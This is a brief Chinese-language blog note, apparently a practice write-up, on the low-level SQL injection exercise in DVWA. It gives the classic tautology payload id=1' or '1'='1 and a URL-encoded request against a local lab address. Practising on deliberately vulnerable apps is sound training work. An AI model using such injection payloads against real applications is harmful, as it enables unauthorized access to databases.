DVWA sqli

level low

可以看到查询请求为

http://192.168.31.xxx/vulnerabilities/sqli/?id=1&Submit=Submit#


##### id 改为 `id=1' or '1'='1` 用来闭合单引号,实现注入

http://192.168.31.xxx/vulnerabilities/sqli/?id=1%27%20or%20%271%27=%20%271&Submit=Submit#

参考: https://www.cnblogs.com/v1vvwv/p/DVWA-SQL-Injection.html

posted @ 2022-10-03 16:18  明月照江江  阅读(29)  评论(0编辑  收藏  举报